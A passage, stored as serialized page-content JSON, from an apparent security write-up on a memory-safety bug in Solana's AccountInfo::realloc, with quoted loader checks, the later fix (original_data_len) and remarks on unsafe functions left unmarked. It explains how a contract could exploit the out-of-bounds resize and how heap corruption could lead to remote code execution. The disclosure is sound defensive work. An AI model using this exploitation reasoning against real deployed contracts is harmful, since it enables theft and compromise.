",{"type":27,"tag":47,"props":24167,"children":24170},{"href":24168,"rel":24169},"https://github.com/solana-labs/solana/blob/94685e1222b3289859a447d62fadea20898241e0/programs/bpf_loader/src/serialization.rs#L324-L328",[51],[24171],{"type":33,"value":24172},"a check",{"type":33,"value":24174}," by the BPF loader, however, and it boils down to:",{"type":27,"tag":101,"props":24176,"children":24178},{"className":10270,"code":24177,"language":10269,"meta":7,"style":7},"if post_len.saturating_sub(*pre_len) > MAX_PERMITTED_DATA_INCREASE\n || post_len > MAX_PERMITTED_DATA_LENGTH as usize\n{\n return Err(InstructionError::InvalidRealloc);\n}\n",[24179],{"type":27,"tag":84,"props":24180,"children":24181},{"__ignoreMap":7},[24182,24220,24250,24257,24289],{"type":27,"tag":207,"props":24183,"children":24184},{"class":209,"line":210},[24185,24189,24194,24198,24202,24206,24210,24215],{"type":27,"tag":207,"props":24186,"children":24187},{"style":376},[24188],{"type":33,"value":9023},{"type":27,"tag":207,"props":24190,"children":24191},{"style":220},[24192],{"type":33,"value":24193}," post_len",{"type":27,"tag":207,"props":24195,"children":24196},{"style":226},[24197],{"type":33,"value":1041},{"type":27,"tag":207,"props":24199,"children":24200},{"style":1335},[24201],{"type":33,"value":21568},{"type":27,"tag":207,"props":24203,"children":24204},{"style":238},[24205],{"type":33,"value":1343},{"type":27,"tag":207,"props":24207,"children":24208},{"style":226},[24209],{"type":33,"value":9286},{"type":27,"tag":207,"props":24211,"children":24212},{"style":220},[24213],{"type":33,"value":24214},"pre_len",{"type":27,"tag":207,"props":24216,"children":24217},{"style":238},[24218],{"type":33,"value":24219},") > MAX_PERMITTED_DATA_INCREASE\n",{"type":27,"tag":207,"props":24221,"children":24222},{"class":209,"line":244},[24223,24228,24232,24236,24241,24245],{"type":27,"tag":207,"props":24224,"children":24225},{"style":226},[24226],{"type":33,"value":24227}," ||",{"type":27,"tag":207,"props":24229,"children":24230},{"style":220},[24231],{"type":33,"value":24193},{"type":27,"tag":207,"props":24233,"children":24234},{"style":226},[24235],{"type":33,"value":21470},{"type":27,"tag":207,"props":24237,"children":24238},{"style":238},[24239],{"type":33,"value":24240}," MAX_PERMITTED_DATA_LENGTH ",{"type":27,"tag":207,"props":24242,"children":24243},{"style":214},[24244],{"type":33,"value":16122},{"type":27,"tag":207,"props":24246,"children":24247},{"style":8920},[24248],{"type":33,"value":24249}," usize\n",{"type":27,"tag":207,"props":24251,"children":24252},{"class":209,"line":270},[24253],{"type":27,"tag":207,"props":24254,"children":24255},{"style":238},[24256],{"type":33,"value":18158},{"type":27,"tag":207,"props":24258,"children":24259},{"class":209,"line":296},[24260,24264,24268,24272,24276,24280,24285],{"type":27,"tag":207,"props":24261,"children":24262},{"style":376},[24263],{"type":33,"value":8986},{"type":27,"tag":207,"props":24265,"children":24266},{"style":8920},[24267],{"type":33,"value":23024},{"type":27,"tag":207,"props":24269,"children":24270},{"style":238},[24271],{"type":33,"value":1343},{"type":27,"tag":207,"props":24273,"children":24274},{"style":8920},[24275],{"type":33,"value":23033},{"type":27,"tag":207,"props":24277,"children":24278},{"style":226},[24279],{"type":33,"value":10768},{"type":27,"tag":207,"props":24281,"children":24282},{"style":8920},[24283],{"type":33,"value":24284},"InvalidRealloc",{"type":27,"tag":207,"props":24286,"children":24287},{"style":238},[24288],{"type":33,"value":1455},{"type":27,"tag":207,"props":24290,"children":24291},{"class":209,"line":445},[24292],{"type":27,"tag":207,"props":24293,"children":24294},{"style":238},[24295],{"type":33,"value":451},{"type":27,"tag":36,"props":24297,"children":24298},{},[24299,24301,24306,24308,24313],{"type":33,"value":24300},"But, like the other checks performed by the loader, this check only runs after the contract ",{"type":27,"tag":942,"props":24302,"children":24303},{},[24304],{"type":33,"value":24305},"finishes",{"type":33,"value":24307}," execution. ",{"type":27,"tag":942,"props":24309,"children":24310},{},[24311],{"type":33,"value":24312},"During",{"type":33,"value":24314}," execution, the contract is free to make whatever modifications to memory that it wants, since Solana's eBPF machine doesn't hook memory accesses in any way.",{"type":27,"tag":36,"props":24316,"children":24317},{},[24318,24320,24325,24327,24332,24334,24341],{"type":33,"value":24319},"The end result is that in order to successfully exploit this bug, an attacker needs a way to change the length back to something valid before the program exits. However, with potentially ",{"type":27,"tag":942,"props":24321,"children":24322},{},[24323],{"type":33,"value":24324},"arbitrary",{"type":33,"value":24326}," memory access through a mistakenly-",{"type":27,"tag":84,"props":24328,"children":24330},{"className":24329},[],[24331],{"type":33,"value":20915},{"type":33,"value":24333},"'d account, this falls in the relm of some ",{"type":27,"tag":47,"props":24335,"children":24338},{"href":24336,"rel":24337},"https://en.wikipedia.org/wiki/Buffer_overflow",[51],[24339],{"type":33,"value":24340},"old-school pwning",{"type":33,"value":24342}," - even if we can't use the out-of-bounds access directly, there's plenty of pointers in memory that could be of use.",{"type":27,"tag":58,"props":24344,"children":24346},{"id":24345},"not-contracts",[24347],{"type":33,"value":24348},"Not-contracts?",{"type":27,"tag":36,"props":24350,"children":24351},{},[24352,24354,24359,24361,24371,24373,24385,24387,24394,24396,24401,24403,24408,24410,24423,24425,24430,24432,24437],{"type":33,"value":24353},"Remember when we said that all this code makes sense ",{"type":27,"tag":942,"props":24355,"children":24356},{},[24357],{"type":33,"value":24358},"if the data points to the BPF loader's serialized buffer",{"type":33,"value":24360},"? Well unfortunately for us, there's nothing enforcing that; all the fields on ",{"type":27,"tag":47,"props":24362,"children":24365},{"href":24363,"rel":24364},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html",[51],[24366],{"type":27,"tag":84,"props":24367,"children":24369},{"className":24368},[],[24370],{"type":33,"value":22213},{"type":33,"value":24372}," are public, and so is its ",{"type":27,"tag":47,"props":24374,"children":24377},{"href":24375,"rel":24376},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html#method.new",[51],[24378,24383],{"type":27,"tag":84,"props":24379,"children":24381},{"className":24380},[],[24382],{"type":33,"value":22397},{"type":33,"value":24384}," method",{"type":33,"value":24386}," (which is ",{"type":27,"tag":47,"props":24388,"children":24391},{"href":24389,"rel":24390},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#160-180",[51],[24392],{"type":33,"value":24393},"nothing more than a thin wrapper around just creating the struct literal yourself",{"type":33,"value":24395},"). The ",{"type":27,"tag":84,"props":24397,"children":24399},{"className":24398},[],[24400],{"type":33,"value":20915},{"type":33,"value":24402}," code critically assumes that the memory 8 bytes behind the data buffer is the data's length and that we can write to it however we want when realloc'ing. So, clearly if we were to create an ",{"type":27,"tag":84,"props":24404,"children":24406},{"className":24405},[],[24407],{"type":33,"value":22213},{"type":33,"value":24409}," ourselves - potentially through the ",{"type":27,"tag":47,"props":24411,"children":24414},{"href":24412,"rel":24413},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/trait.Account.html",[51],[24415,24421],{"type":27,"tag":84,"props":24416,"children":24418},{"className":24417},[],[24419],{"type":33,"value":24420},"Account",{"type":33,"value":24422}," trait",{"type":33,"value":24424},", which is hardly documented at all and makes ",{"type":27,"tag":942,"props":24426,"children":24427},{},[24428],{"type":33,"value":24429},"no",{"type":33,"value":24431}," mention of any prerequisites about the nature of the references that need to be returned - we'd run in to problems from pretty much any practical way we'd allocate the ",{"type":27,"tag":84,"props":24433,"children":24435},{"className":24434},[],[24436],{"type":33,"value":9468},{"type":33,"value":9485},{"type":27,"tag":36,"props":24439,"children":24440},{},[24441,24443,24454,24456,24462,24464,24470,24472,24485,24487,24492,24494,24499,24500,24505,24507,24512,24514,24519,24521,24526],{"type":33,"value":24442},"One long arm of this is ",{"type":27,"tag":47,"props":24444,"children":24447},{"href":24445,"rel":24446},"https://docs.rs/solana-sdk/1.10.28/solana_sdk/account/struct.Account.html",[51],[24448],{"type":27,"tag":84,"props":24449,"children":24451},{"className":24450},[],[24452],{"type":33,"value":24453},"solana_sdk::account::Account",{"type":33,"value":24455}," - in the client SDK. It holds an account's data in a ",{"type":27,"tag":84,"props":24457,"children":24459},{"className":24458},[],[24460],{"type":33,"value":24461},"Vec\u003Cu8>",{"type":33,"value":24463},", and it implements ",{"type":27,"tag":84,"props":24465,"children":24467},{"className":24466},[],[24468],{"type":33,"value":24469},"solana_program::account_info::Account",{"type":33,"value":24471}," (the trait from earlier) - by ",{"type":27,"tag":47,"props":24473,"children":24476},{"href":24474,"rel":24475},"https://docs.rs/solana-sdk/1.10.28/src/solana_sdk/account.rs.html#661-669",[51],[24477,24479],{"type":33,"value":24478},"returning a reference to the contents of that ",{"type":27,"tag":84,"props":24480,"children":24482},{"className":24481},[],[24483],{"type":33,"value":24484},"Vec",{"type":33,"value":24486},". So, ",{"type":27,"tag":84,"props":24488,"children":24490},{"className":24489},[],[24491],{"type":33,"value":20915},{"type":33,"value":24493}," writes the size into the 8 bytes right before ",{"type":27,"tag":84,"props":24495,"children":24497},{"className":24496},[],[24498],{"type":33,"value":9468},{"type":33,"value":4685},{"type":27,"tag":84,"props":24501,"children":24503},{"className":24502},[],[24504],{"type":33,"value":9468},{"type":33,"value":24506}," is the buffer of a ",{"type":27,"tag":84,"props":24508,"children":24510},{"className":24509},[],[24511],{"type":33,"value":24484},{"type":33,"value":24513},", and so it is the contents of a heap allocation; and, immediately before a heap allocation sits critical metadata. The result? If, for some reason, you construct an ",{"type":27,"tag":84,"props":24515,"children":24517},{"className":24516},[],[24518],{"type":33,"value":22213},{"type":33,"value":24520}," out of an SDK ",{"type":27,"tag":84,"props":24522,"children":24524},{"className":24523},[],[24525],{"type":33,"value":24420},{"type":33,"value":24527}," and then realloc it (which admittedly is quite a stretch), then you get heap corruption - something that's very likely to lead to remote code execution.",{"type":27,"tag":28,"props":24529,"children":24531},{"id":24530},"remediation",[24532],{"type":33,"value":24533},"Remediation",{"type":27,"tag":36,"props":24535,"children":24536},{},[24537],{"type":33,"value":24538},"Obviously the fix for the main issue at hand is to check that the resize operation remains in-bounds. But how do we know how big is too big?",{"type":27,"tag":36,"props":24540,"children":24541},{},[24542,24544,24549,24551,24556,24558,24568,24570,24575,24577,24584],{"type":33,"value":24543},"The sensible thing to do would be to store the initial size in the ",{"type":27,"tag":84,"props":24545,"children":24547},{"className":24546},[],[24548],{"type":33,"value":22213},{"type":33,"value":24550},"... except for the fact that the layout of ",{"type":27,"tag":84,"props":24552,"children":24554},{"className":24553},[],[24555],{"type":33,"value":22213},{"type":33,"value":24557}," is actually part of the ABI between the contract runtime and the loader :face_palm:",{"type":27,"tag":22749,"props":24559,"children":24560},{},[24561],{"type":27,"tag":47,"props":24562,"children":24566},{"href":24563,"ariaDescribedBy":24564,"dataFootnoteRef":7,"id":24565},"#user-content-fn-layout",[22756],"user-content-fnref-layout",[24567],{"type":33,"value":1735},{"type":33,"value":24569}," So, with changing ",{"type":27,"tag":84,"props":24571,"children":24573},{"className":24572},[],[24574],{"type":33,"value":22213},{"type":33,"value":24576}," out of the question, the Solana team came up with a different place to stash the information: inside a section of padding in the serialized buffer passed from the runtime. This happened to be next to where the pubkey was stored, which resulted in the creation of ",{"type":27,"tag":47,"props":24578,"children":24581},{"href":24579,"rel":24580},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#74-85",[51],[24582],{"type":33,"value":24583},"this function",{"type":33,"value":736},{"type":27,"tag":101,"props":24586,"children":24588},{"className":10270,"code":24587,"language":10269,"meta":7,"style":7},"/// Return the account's original data length when it was serialized for the\n/// current program invocation.\n///\n/// # Safety\n///\n/// This method assumes that the original data length was serialized as a u32\n/// integer in the 4 bytes immediately preceding the serialized account key.\npub unsafe fn original_data_len(&self) -> usize {\n let key_ptr = self.key as *const _ as *const u8;\n let original_data_len_ptr = key_ptr.offset(-4) as *const u32;\n *original_data_len_ptr as usize\n}\n",[24589],{"type":27,"tag":84,"props":24590,"children":24591},{"__ignoreMap":7},[24592,24600,24608,24616,24624,24631,24639,24647,24695,24760,24825,24846],{"type":27,"tag":207,"props":24593,"children":24594},{"class":209,"line":210},[24595],{"type":27,"tag":207,"props":24596,"children":24597},{"style":4647},[24598],{"type":33,"value":24599},"/// Return the account's original data length when it was serialized for the\n",{"type":27,"tag":207,"props":24601,"children":24602},{"class":209,"line":244},[24603],{"type":27,"tag":207,"props":24604,"children":24605},{"style":4647},[24606],{"type":33,"value":24607},"/// current program invocation.\n",{"type":27,"tag":207,"props":24609,"children":24610},{"class":209,"line":270},[24611],{"type":27,"tag":207,"props":24612,"children":24613},{"style":4647},[24614],{"type":33,"value":24615},"///\n",{"type":27,"tag":207,"props":24617,"children":24618},{"class":209,"line":296},[24619],{"type":27,"tag":207,"props":24620,"children":24621},{"style":4647},[24622],{"type":33,"value":24623},"/// # Safety\n",{"type":27,"tag":207,"props":24625,"children":24626},{"class":209,"line":445},[24627],{"type":27,"tag":207,"props":24628,"children":24629},{"style":4647},[24630],{"type":33,"value":24615},{"type":27,"tag":207,"props":24632,"children":24633},{"class":209,"line":867},[24634],{"type":27,"tag":207,"props":24635,"children":24636},{"style":4647},[24637],{"type":33,"value":24638},"/// This method assumes that the original data length was serialized as a u32\n",{"type":27,"tag":207,"props":24640,"children":24641},{"class":209,"line":892},[24642],{"type":27,"tag":207,"props":24643,"children":24644},{"style":4647},[24645],{"type":33,"value":24646},"/// integer in the 4 bytes immediately preceding the serialized account key.\n",{"type":27,"tag":207,"props":24648,"children":24649},{"class":209,"line":1475},[24650,24654,24658,24662,24667,24671,24675,24679,24683,24687,24691],{"type":27,"tag":207,"props":24651,"children":24652},{"style":214},[24653],{"type":33,"value":20967},{"type":27,"tag":207,"props":24655,"children":24656},{"style":214},[24657],{"type":33,"value":21866},{"type":27,"tag":207,"props":24659,"children":24660},{"style":214},[24661],{"type":33,"value":20972},{"type":27,"tag":207,"props":24663,"children":24664},{"style":1335},[24665],{"type":33,"value":24666}," original_data_len",{"type":27,"tag":207,"props":24668,"children":24669},{"style":238},[24670],{"type":33,"value":1343},{"type":27,"tag":207,"props":24672,"children":24673},{"style":226},[24674],{"type":33,"value":10398},{"type":27,"tag":207,"props":24676,"children":24677},{"style":214},[24678],{"type":33,"value":20990},{"type":27,"tag":207,"props":24680,"children":24681},{"style":238},[24682],{"type":33,"value":2222},{"type":27,"tag":207,"props":24684,"children":24685},{"style":226},[24686],{"type":33,"value":8968},{"type":27,"tag":207,"props":24688,"children":24689},{"style":8920},[24690],{"type":33,"value":21008},{"type":27,"tag":207,"props":24692,"children":24693},{"style":238},[24694],{"type":33,"value":384},{"type":27,"tag":207,"props":24696,"children":24697},{"class":209,"line":2065},[24698,24702,24707,24711,24715,24719,24724,24728,24732,24736,24740,24744,24748,24752,24756],{"type":27,"tag":207,"props":24699,"children":24700},{"style":214},[24701],{"type":33,"value":10290},{"type":27,"tag":207,"props":24703,"children":24704},{"style":220},[24705],{"type":33,"value":24706}," key_ptr",{"type":27,"tag":207,"props":24708,"children":24709},{"style":226},[24710],{"type":33,"value":229},{"type":27,"tag":207,"props":24712,"children":24713},{"style":214},[24714],{"type":33,"value":21073},{"type":27,"tag":207,"props":24716,"children":24717},{"style":226},[24718],{"type":33,"value":1041},{"type":27,"tag":207,"props":24720,"children":24721},{"style":238},[24722],{"type":33,"value":24723},"key ",{"type":27,"tag":207,"props":24725,"children":24726},{"style":214},[24727],{"type":33,"value":16122},{"type":27,"tag":207,"props":24729,"children":24730},{"style":226},[24731],{"type":33,"value":17093},{"type":27,"tag":207,"props":24733,"children":24734},{"style":214},[24735],{"type":33,"value":16931},{"type":27,"tag":207,"props":24737,"children":24738},{"style":220},[24739],{"type":33,"value":10326},{"type":27,"tag":207,"props":24741,"children":24742},{"style":214},[24743],{"type":33,"value":16108},{"type":27,"tag":207,"props":24745,"children":24746},{"style":226},[24747],{"type":33,"value":17093},{"type":27,"tag":207,"props":24749,"children":24750},{"style":214},[24751],{"type":33,"value":16931},{"type":27,"tag":207,"props":24753,"children":24754},{"style":8920},[24755],{"type":33,"value":21910},{"type":27,"tag":207,"props":24757,"children":24758},{"style":238},[24759],{"type":33,"value":241},{"type":27,"tag":207,"props":24761,"children":24762},{"class":209,"line":2092},[24763,24767,24772,24776,24780,24784,24788,24792,24796,24800,24804,24808,24812,24816,24821],{"type":27,"tag":207,"props":24764,"children":24765},{"style":214},[24766],{"type":33,"value":10290},{"type":27,"tag":207,"props":24768,"children":24769},{"style":220},[24770],{"type":33,"value":24771}," original_data_len_ptr",{"type":27,"tag":207,"props":24773,"children":24774},{"style":226},[24775],{"type":33,"value":229},{"type":27,"tag":207,"props":24777,"children":24778},{"style":220},[24779],{"type":33,"value":24706},{"type":27,"tag":207,"props":24781,"children":24782},{"style":226},[24783],{"type":33,"value":1041},{"type":27,"tag":207,"props":24785,"children":24786},{"style":1335},[24787],{"type":33,"value":21177},{"type":27,"tag":207,"props":24789,"children":24790},{"style":238},[24791],{"type":33,"value":1343},{"type":27,"tag":207,"props":24793,"children":24794},{"style":226},[24795],{"type":33,"value":11611},{"type":27,"tag":207,"props":24797,"children":24798},{"style":232},[24799],{"type":33,"value":1693},{"type":27,"tag":207,"props":24801,"children":24802},{"style":238},[24803],{"type":33,"value":2222},{"type":27,"tag":207,"props":24805,"children":24806},{"style":214},[24807],{"type":33,"value":16122},{"type":27,"tag":207,"props":24809,"children":24810},{"style":226},[24811],{"type":33,"value":17093},{"type":27,"tag":207,"props":24813,"children":24814},{"style":214},[24815],{"type":33,"value":16931},{"type":27,"tag":207,"props":24817,"children":24818},{"style":8920},[24819],{"type":33,"value":24820}," u32",{"type":27,"tag":207,"props":24822,"children":24823},{"style":238},[24824],{"type":33,"value":241},{"type":27,"tag":207,"props":24826,"children":24827},{"class":209,"line":2130},[24828,24833,24838,24842],{"type":27,"tag":207,"props":24829,"children":24830},{"style":226},[24831],{"type":33,"value":24832}," *",{"type":27,"tag":207,"props":24834,"children":24835},{"style":220},[24836],{"type":33,"value":24837},"original_data_len_ptr",{"type":27,"tag":207,"props":24839,"children":24840},{"style":214},[24841],{"type":33,"value":16108},{"type":27,"tag":207,"props":24843,"children":24844},{"style":8920},[24845],{"type":33,"value":24249},{"type":27,"tag":207,"props":24847,"children":24848},{"class":209,"line":2168},[24849],{"type":27,"tag":207,"props":24850,"children":24851},{"style":238},[24852],{"type":33,"value":451},{"type":27,"tag":36,"props":24854,"children":24855},{},[24856,24858,24863,24865,24870,24872,24877,24879,24884,24886,24893,24895,24902,24903,24910,24911,24918,24919,24926],{"type":33,"value":24857},"It's marked ",{"type":27,"tag":84,"props":24859,"children":24861},{"className":24860},[],[24862],{"type":33,"value":21632},{"type":33,"value":24864},", properly documented, but there's just one problem: we need this for ",{"type":27,"tag":84,"props":24866,"children":24868},{"className":24867},[],[24869],{"type":33,"value":20915},{"type":33,"value":24871},", which originally was not ",{"type":27,"tag":84,"props":24873,"children":24875},{"className":24874},[],[24876],{"type":33,"value":21632},{"type":33,"value":24878},". So, in the name of not breaking API compatibility, the Solana team just threw the call in an ",{"type":27,"tag":84,"props":24880,"children":24882},{"className":24881},[],[24883],{"type":33,"value":21632},{"type":33,"value":24885}," block and added ",{"type":27,"tag":47,"props":24887,"children":24890},{"href":24888,"rel":24889},"https://docs.rs/solana-program/1.10.30/solana_program/account_info/struct.AccountInfo.html#safety-1",[51],[24891],{"type":33,"value":24892},"a doc comment",{"type":33,"value":24894}," - adding to the ",{"type":27,"tag":47,"props":24896,"children":24899},{"href":24897,"rel":24898},"https://docs.rs/solana-program/1.10.30/solana_program/program/fn.invoke_signed_unchecked.html#safety",[51],[24900],{"type":33,"value":24901},"small",{"type":33,"value":13740},{"type":27,"tag":47,"props":24904,"children":24907},{"href":24905,"rel":24906},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcpy.html#safety",[51],[24908],{"type":33,"value":24909},"pile",{"type":33,"value":13740},{"type":27,"tag":47,"props":24912,"children":24915},{"href":24913,"rel":24914},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memset.html#safety",[51],[24916],{"type":33,"value":24917},"of",{"type":33,"value":13740},{"type":27,"tag":47,"props":24920,"children":24923},{"href":24921,"rel":24922},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcmp.html#safety",[51],[24924],{"type":33,"value":24925},"functions",{"type":33,"value":24927}," that are actually unsafe but aren't marked as such for API compatibility reasons (and the last three - all related to each other - don't even have the comment until version 1.11, which isn't even on mainnet as of the time of writing).",{"type":27,"tag":28,"props":24929,"children":24931},{"id":24930},"towards-safer-unsafe",[24932,24934],{"type":33,"value":24933},"Towards safer ",{"type":27,"tag":84,"props":24935,"children":24937},{"className":24936},[],[24938],{"type":33,"value":21632},{"type":27,"tag":36,"props":24940,"children":24941},{},[24942,24944,24949,24951,24956,24958,24965],{"type":33,"value":24943},"Let's circle back to that main ",{"type":27,"tag":84,"props":24945,"children":24947},{"className":24946},[],[24948],{"type":33,"value":21632},{"type":33,"value":24950}," block inside ",{"type":27,"tag":84,"props":24952,"children":24954},{"className":24953},[],[24955],{"type":33,"value":20915},{"type":33,"value":24957}," for a bit, shall we? As a reminder, it looks like ",{"type":27,"tag":47,"props":24959,"children":24962},{"href":24960,"rel":24961},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#127-136",[51],[24963],{"type":33,"value":24964},"this",{"type":33,"value":736},{"type":27,"tag":101,"props":24967,"children":24969},{"className":10270,"code":24968,"language":10269,"meta":7,"style":7},"// realloc\nunsafe {\n // First set new length in the serialized data\n let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n *ptr = new_len as u64;\n\n // Then set the new length in the local slice\n let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n *ptr = new_len as u64;\n}\n",[24970],{"type":27,"tag":84,"props":24971,"children":24972},{"__ignoreMap":7},[24973,24981,24992,25000,25087,25118,25125,25133,25260,25291],{"type":27,"tag":207,"props":24974,"children":24975},{"class":209,"line":210},[24976],{"type":27,"tag":207,"props":24977,"children":24978},{"style":4647},[24979],{"type":33,"value":24980},"// realloc\n",{"type":27,"tag":207,"props":24982,"children":24983},{"class":209,"line":244},[24984,24988],{"type":27,"tag":207,"props":24985,"children":24986},{"style":214},[24987],{"type":33,"value":21632},{"type":27,"tag":207,"props":24989,"children":24990},{"style":238},[24991],{"type":33,"value":384},{"type":27,"tag":207,"props":24993,"children":24994},{"class":209,"line":270},[24995],{"type":27,"tag":207,"props":24996,"children":24997},{"style":4647},[24998],{"type":33,"value":24999}," // First set new length in the serialized data\n",{"type":27,"tag":207,"props":25001,"children":25002},{"class":209,"line":296},[25003,25007,25011,25015,25019,25023,25027,25031,25035,25039,25043,25047,25051,25055,25059,25063,25067,25071,25075,25079,25083],{"type":27,"tag":207,"props":25004,"children":25005},{"style":214},[25006],{"type":33,"value":10290},{"type":27,"tag":207,"props":25008,"children":25009},{"style":220},[25010],{"type":33,"value":21133},{"type":27,"tag":207,"props":25012,"children":25013},{"style":226},[25014],{"type":33,"value":229},{"type":27,"tag":207,"props":25016,"children":25017},{"style":214},[25018],{"type":33,"value":21073},{"type":27,"tag":207,"props":25020,"children":25021},{"style":226},[25022],{"type":33,"value":1041},{"type":27,"tag":207,"props":25024,"children":25025},{"style":1335},[25026],{"type":33,"value":21150},{"type":27,"tag":207,"props":25028,"children":25029},{"style":238},[25030],{"type":33,"value":21155},{"type":27,"tag":207,"props":25032,"children":25033},{"style":226},[25034],{"type":33,"value":10421},{"type":27,"tag":207,"props":25036,"children":25037},{"style":1335},[25038],{"type":33,"value":21164},{"type":27,"tag":207,"props":25040,"children":25041},{"style":238},[25042],{"type":33,"value":21155},{"type":27,"tag":207,"props":25044,"children":25045},{"style":226},[25046],{"type":33,"value":1041},{"type":27,"tag":207,"props":25048,"children":25049},{"style":1335},[25050],{"type":33,"value":21177},{"type":27,"tag":207,"props":25052,"children":25053},{"style":238},[25054],{"type":33,"value":1343},{"type":27,"tag":207,"props":25056,"children":25057},{"style":226},[25058],{"type":33,"value":11611},{"type":27,"tag":207,"props":25060,"children":25061},{"style":232},[25062],{"type":33,"value":3578},{"type":27,"tag":207,"props":25064,"children":25065},{"style":238},[25066],{"type":33,"value":2222},{"type":27,"tag":207,"props":25068,"children":25069},{"style":214},[25070],{"type":33,"value":16122},{"type":27,"tag":207,"props":25072,"children":25073},{"style":226},[25074],{"type":33,"value":17093},{"type":27,"tag":207,"props":25076,"children":25077},{"style":214},[25078],{"type":33,"value":11009},{"type":27,"tag":207,"props":25080,"children":25081},{"style":8920},[25082],{"type":33,"value":13142},{"type":27,"tag":207,"props":25084,"children":25085},{"style":238},[25086],{"type":33,"value":241},{"type":27,"tag":207,"props":25088,"children":25089},{"class":209,"line":445},[25090,25094,25098,25102,25106,25110,25114],{"type":27,"tag":207,"props":25091,"children":25092},{"style":226},[25093],{"type":33,"value":24832},{"type":27,"tag":207,"props":25095,"children":25096},{"style":220},[25097],{"type":33,"value":21225},{"type":27,"tag":207,"props":25099,"children":25100},{"style":226},[25101],{"type":33,"value":229},{"type":27,"tag":207,"props":25103,"children":25104},{"style":220},[25105],{"type":33,"value":21234},{"type":27,"tag":207,"props":25107,"children":25108},{"style":214},[25109],{"type":33,"value":16108},{"type":27,"tag":207,"props":25111,"children":25112},{"style":8920},[25113],{"type":33,"value":13142},{"type":27,"tag":207,"props":25115,"children":25116},{"style":238},[25117],{"type":33,"value":241},{"type":27,"tag":207,"props":25119,"children":25120},{"class":209,"line":867},[25121],{"type":27,"tag":207,"props":25122,"children":25123},{"emptyLinePlaceholder":19},[25124],{"type":33,"value":2062},{"type":27,"tag":207,"props":25126,"children":25127},{"class":209,"line":892},[25128],{"type":27,"tag":207,"props":25129,"children":25130},{"style":4647},[25131],{"type":33,"value":25132}," // Then set the new length in the local slice\n",{"type":27,"tag":207,"props":25134,"children":25135},{"class":209,"line":1475},[25136,25140,25144,25148,25152,25156,25160,25164,25168,25172,25176,25180,25184,25188,25192,25196,25200,25204,25208,25212,25216,25220,25224,25228,25232,25236,25240,25244,25248,25252,25256],{"type":27,"tag":207,"props":25137,"children":25138},{"style":214},[25139],{"type":33,"value":10290},{"type":27,"tag":207,"props":25141,"children":25142},{"style":220},[25143],{"type":33,"value":21133},{"type":27,"tag":207,"props":25145,"children":25146},{"style":226},[25147],{"type":33,"value":229},{"type":27,"tag":207,"props":25149,"children":25150},{"style":226},[25151],{"type":33,"value":14423},{"type":27,"tag":207,"props":25153,"children":25154},{"style":214},[25155],{"type":33,"value":11009},{"type":27,"tag":207,"props":25157,"children":25158},{"style":226},[25159],{"type":33,"value":17093},{"type":27,"tag":207,"props":25161,"children":25162},{"style":238},[25163],{"type":33,"value":21293},{"type":27,"tag":207,"props":25165,"children":25166},{"style":214},[25167],{"type":33,"value":20990},{"type":27,"tag":207,"props":25169,"children":25170},{"style":226},[25171],{"type":33,"value":1041},{"type":27,"tag":207,"props":25173,"children":25174},{"style":238},[25175],{"type":33,"value":9468},{"type":27,"tag":207,"props":25177,"children":25178},{"style":226},[25179],{"type":33,"value":1041},{"type":27,"tag":207,"props":25181,"children":25182},{"style":1335},[25183],{"type":33,"value":21314},{"type":27,"tag":207,"props":25185,"children":25186},{"style":238},[25187],{"type":33,"value":21319},{"type":27,"tag":207,"props":25189,"children":25190},{"style":214},[25191],{"type":33,"value":16122},{"type":27,"tag":207,"props":25193,"children":25194},{"style":226},[25195],{"type":33,"value":17093},{"type":27,"tag":207,"props":25197,"children":25198},{"style":214},[25199],{"type":33,"value":16931},{"type":27,"tag":207,"props":25201,"children":25202},{"style":8920},[25203],{"type":33,"value":13142},{"type":27,"tag":207,"props":25205,"children":25206},{"style":238},[25207],{"type":33,"value":10416},{"type":27,"tag":207,"props":25209,"children":25210},{"style":226},[25211],{"type":33,"value":1041},{"type":27,"tag":207,"props":25213,"children":25214},{"style":1335},[25215],{"type":33,"value":21177},{"type":27,"tag":207,"props":25217,"children":25218},{"style":238},[25219],{"type":33,"value":1343},{"type":27,"tag":207,"props":25221,"children":25222},{"style":232},[25223],{"type":33,"value":1651},{"type":27,"tag":207,"props":25225,"children":25226},{"style":238},[25227],{"type":33,"value":2222},{"type":27,"tag":207,"props":25229,"children":25230},{"style":214},[25231],{"type":33,"value":16122},{"type":27,"tag":207,"props":25233,"children":25234},{"style":8920},[25235],{"type":33,"value":13142},{"type":27,"tag":207,"props":25237,"children":25238},{"style":238},[25239],{"type":33,"value":2222},{"type":27,"tag":207,"props":25241,"children":25242},{"style":214},[25243],{"type":33,"value":16122},{"type":27,"tag":207,"props":25245,"children":25246},{"style":226},[25247],{"type":33,"value":17093},{"type":27,"tag":207,"props":25249,"children":25250},{"style":214},[25251],{"type":33,"value":11009},{"type":27,"tag":207,"props":25253,"children":25254},{"style":8920},[25255],{"type":33,"value":13142},{"type":27,"tag":207,"props":25257,"children":25258},{"style":238},[25259],{"type":33,"value":1455},{"type":27,"tag":207,"props":25261,"children":25262},{"class":209,"line":2065},[25263,25267,25271,25275,25279,25283,25287],{"type":27,"tag":207,"props":25264,"children":25265},{"style":226},[25266],{"type":33,"value":24832},{"type":27,"tag":207,"props":25268,"children":25269},{"style":220},[25270],{"type":33,"value":21225},{"type":27,"tag":207,"props":25272,"children":25273},{"style":226},[25274],{"type":33,"value":229},{"type":27,"tag":207,"props":25276,"children":25277},{"style":220},[25278],{"type":33,"value":21234},{"type":27,"tag":207,"props":25280,"children":25281},{"style":214},[25282],{"type":33,"value":16108},{"type":27,"tag":207,"props":25284,"children":25285},{"style":8920},[25286],{"type":33,"value":13142},{"type":27,"tag":207,"props":25288,"children":25289},{"style":238},[25290],{"type":33,"value":241},{"type":27,"tag":207,"props":25292,"children":25293},{"class":209,"line":2092},[25294],{"type":27,"tag":207,"props":25295,"children":25296},{"style":238},[25297],{"type":33,"value":451},{